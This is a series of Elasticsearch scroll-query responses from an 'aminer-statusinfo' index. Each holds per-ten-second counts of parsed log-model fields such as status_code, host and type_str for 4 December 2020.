{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"nTPpLXYBIkOurnXXC4e7","_score":1.0,"_source":{"FromTime":1.60708800617559E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":36,"/parser/model/type_str":17371,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:16.212Z","ToTime":1.607088016175659E9,"fromtimestamp":"2020-12-04T13:20:06.175Z","totimestamp":"2020-12-04T13:20:16.175Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ojPpLXYBIkOurnXXNodQ","_score":1.0,"_source":{"FromTime":1.607088017076398E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":167,"/parser/model/type_str":10246,"/parser/model/classification":0,"/parser/model/status_code":80,"/parser/model/host":14,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:27.113Z","ToTime":1.607088027076495E9,"fromtimestamp":"2020-12-04T13:20:17.076Z","totimestamp":"2020-12-04T13:20:27.076Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qDPpLXYBIkOurnXXXoc-","_score":1.0,"_source":{"FromTime":1.607088027294802E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":1039,"/parser/model/classification":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":1},"timestamp":"2020-12-04T13:20:37.335Z","ToTime":1.607088037294874E9,"fromtimestamp":"2020-12-04T13:20:27.294Z","totimestamp":"2020-12-04T13:20:37.294Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPpLXYBIkOurnXXiIco","_score":1.0,"_source":{"FromTime":1.607088038027988E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":77,"/parser/model/type_str":3861,"/parser/model/classification":0,"/parser/model/status_code":23,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:48.065Z","ToTime":1.607088048028038E9,"fromtimestamp":"2020-12-04T13:20:38.027Z","totimestamp":"2020-12-04T13:20:48.028Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPpLXYBIkOurnXXsYfd","_score":1.0,"_source":{"FromTime":1.6070880487057E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":3633,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":9,"/parser/model/sp":3},"timestamp":"2020-12-04T13:20:58.742Z","ToTime":1.607088058705801E9,"fromtimestamp":"2020-12-04T13:20:48.705Z","totimestamp":"2020-12-04T13:20:58.705Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uDPpLXYBIkOurnXX3Idz","_score":1.0,"_source":{"FromTime":1.607088059606552E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":84,"/parser/model/type_str":15434,"/parser/model/classification":0,"/parser/model/status_code":27,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:09.644Z","ToTime":1.607088069606614E9,"fromtimestamp":"2020-12-04T13:20:59.606Z","totimestamp":"2020-12-04T13:21:09.606Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPqLXYBIkOurnXXA4f9","_score":1.0,"_source":{"FromTime":1.607088069728031E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":10,"/parser/model/type_str":481,"/parser/model/classification":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:19.766Z","ToTime":1.607088079728122E9,"fromtimestamp":"2020-12-04T13:21:09.728Z","totimestamp":"2020-12-04T13:21:19.728Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wjPqLXYBIkOurnXXLoeH","_score":1.0,"_source":{"FromTime":1.607088080617636E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":72,"/parser/model/type_str":4831,"/parser/model/classification":0,"/parser/model/status_code":33,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:30.656Z","ToTime":1.607088090617719E9,"fromtimestamp":"2020-12-04T13:21:20.617Z","totimestamp":"2020-12-04T13:21:30.617Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPqLXYBIkOurnXXVYfA","_score":1.0,"_source":{"FromTime":1.607088090628122E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":198,"/parser/model/type_str":16702,"/parser/model/classification":0,"/parser/model/status_code":31,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:40.697Z","ToTime":1.607088100628174E9,"fromtimestamp":"2020-12-04T13:21:30.628Z","totimestamp":"2020-12-04T13:21:40.628Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"3zPrLXYBIkOurnXXK4c3","_score":1.0,"_source":{"FromTime":1.607088145306266E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":426,"/parser/model/type_str":51066,"/parser/model/php":0,"/parser/model/status_code":139,"/parser/model/host":47,"/parser/model/sp":4},"timestamp":"2020-12-04T13:22:35.344Z","ToTime":1.607088155306352E9,"fromtimestamp":"2020-12-04T13:22:25.306Z","totimestamp":"2020-12-04T13:22:35.306Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4zPrLXYBIkOurnXXUodo","_score":1.0,"_source":{"FromTime":1.607088155324363E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":169,"/parser/model/type_str":22707,"/parser/model/php":0,"/parser/model/status_code":62,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:45.377Z","ToTime":1.607088165324514E9,"fromtimestamp":"2020-12-04T13:22:35.324Z","totimestamp":"2020-12-04T13:22:45.324Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6jPrLXYBIkOurnXXe4cc","_score":1.0,"_source":{"FromTime":1.607088165758297E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":378,"/parser/model/type_str":35426,"/parser/model/php":0,"/parser/model/status_code":80,"/parser/model/host":15,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:55.797Z","ToTime":1.607088175758337E9,"fromtimestamp":"2020-12-04T13:22:45.758Z","totimestamp":"2020-12-04T13:22:55.758Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7jPrLXYBIkOurnXXpIcU","_score":1.0,"_source":{"FromTime":1.607088176247121E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":2684,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":7,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:06.284Z","ToTime":1.607088186247198E9,"fromtimestamp":"2020-12-04T13:22:56.247Z","totimestamp":"2020-12-04T13:23:06.247Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPrLXYBIkOurnXXzYe8","_score":1.0,"_source":{"FromTime":1.607088186891987E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3552,"/parser/model/php":0,"/parser/model/status_code":8,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:16.949Z","ToTime":1.607088196892045E9,"fromtimestamp":"2020-12-04T13:23:06.891Z","totimestamp":"2020-12-04T13:23:16.892Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DPrLXYBIkOurnXX9Yed","_score":1.0,"_source":{"FromTime":1.60708819712081E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":39,"/parser/model/type_str":1110,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:27.157Z","ToTime":1.607088207120882E9,"fromtimestamp":"2020-12-04T13:23:17.120Z","totimestamp":"2020-12-04T13:23:27.120Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TPsLXYBIkOurnXXHocN","_score":1.0,"_source":{"FromTime":1.607088207472226E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1741,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":11,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:37.510Z","ToTime":1.607088217472315E9,"fromtimestamp":"2020-12-04T13:23:27.472Z","totimestamp":"2020-12-04T13:23:37.472Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ATPsLXYBIkOurnXXSIgE","_score":1.0,"_source":{"FromTime":1.607088218216699E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":4167,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:48.252Z","ToTime":1.607088228216758E9,"fromtimestamp":"2020-12-04T13:23:38.216Z","totimestamp":"2020-12-04T13:23:48.216Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CDPsLXYBIkOurnXXb4go","_score":1.0,"_source":{"FromTime":1.607088228236653E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:58.273Z","ToTime":1.607088238236712E9,"fromtimestamp":"2020-12-04T13:23:48.236Z","totimestamp":"2020-12-04T13:23:58.236Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DDPsLXYBIkOurnXXl4jN","_score":1.0,"_source":{"FromTime":1.607088238639867E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":2231,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:08.677Z","ToTime":1.607088248639983E9,"fromtimestamp":"2020-12-04T13:23:58.639Z","totimestamp":"2020-12-04T13:24:08.639Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EDPsLXYBIkOurnXXv4hE","_score":1.0,"_source":{"FromTime":1.607088248719976E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":70,"/parser/model/type_str":5910,"/parser/model/php":0,"/parser/model/status_code":30,"/parser/model/host":9,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:18.781Z","ToTime":1.60708825872006E9,"fromtimestamp":"2020-12-04T13:24:08.719Z","totimestamp":"2020-12-04T13:24:18.720Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"FjPsLXYBIkOurnXX54gp","_score":1.0,"_source":{"FromTime":1.607088258956716E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":40,"/parser/model/type_str":1044,"/parser/model/php":0,"/parser/model/status_code":12,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:28.994Z","ToTime":1.607088268956817E9,"fromtimestamp":"2020-12-04T13:24:18.956Z","totimestamp":"2020-12-04T13:24:28.956Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GjPtLXYBIkOurnXXEIj5","_score":1.0,"_source":{"FromTime":1.607088269659532E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":3839,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:39.697Z","ToTime":1.607088279659616E9,"fromtimestamp":"2020-12-04T13:24:29.659Z","totimestamp":"2020-12-04T13:24:39.659Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HzPtLXYBIkOurnXXOYhP","_score":1.0,"_source":{"FromTime":1.607088279986282E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":1729,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:50.024Z","ToTime":1.607088289986358E9,"fromtimestamp":"2020-12-04T13:24:39.986Z","totimestamp":"2020-12-04T13:24:49.986Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JTPtLXYBIkOurnXXYIjV","_score":1.0,"_source":{"FromTime":1.607088290105456E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":488,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":2},"timestamp":"2020-12-04T13:25:00.142Z","ToTime":1.607088300105532E9,"fromtimestamp":"2020-12-04T13:24:50.105Z","totimestamp":"2020-12-04T13:25:00.105Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KjPtLXYBIkOurnXXiIhn","_score":1.0,"_source":{"FromTime":1.607088300236322E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":405,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:10.273Z","ToTime":1.607088310236405E9,"fromtimestamp":"2020-12-04T13:25:00.236Z","totimestamp":"2020-12-04T13:25:10.236Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LjPtLXYBIkOurnXXsogA","_score":1.0,"_source":{"FromTime":1.607088310881677E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3525,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:20.921Z","ToTime":1.607088320881773E9,"fromtimestamp":"2020-12-04T13:25:10.881Z","totimestamp":"2020-12-04T13:25:20.881Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NDPtLXYBIkOurnXX24gM","_score":1.0,"_source":{"FromTime":1.607088321391445E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2498,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:31.429Z","ToTime":1.607088331391522E9,"fromtimestamp":"2020-12-04T13:25:21.391Z","totimestamp":"2020-12-04T13:25:31.391Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ODPuLXYBIkOurnXXAoiV","_score":1.0,"_source":{"FromTime":1.607088331512345E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":312,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:41.550Z","ToTime":1.607088341512401E9,"fromtimestamp":"2020-12-04T13:25:31.512Z","totimestamp":"2020-12-04T13:25:41.512Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PTPuLXYBIkOurnXXKogl","_score":1.0,"_source":{"FromTime":1.607088341638619E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":490,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:51.677Z","ToTime":1.60708835163873E9,"fromtimestamp":"2020-12-04T13:25:41.638Z","totimestamp":"2020-12-04T13:25:51.638Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"QzPuLXYBIkOurnXXUYiA","_score":1.0,"_source":{"FromTime":1.607088351700008E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":178,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:01.752Z","ToTime":1.607088361700072E9,"fromtimestamp":"2020-12-04T13:25:51.700Z","totimestamp":"2020-12-04T13:26:01.700Z","version":"1"}}]}} 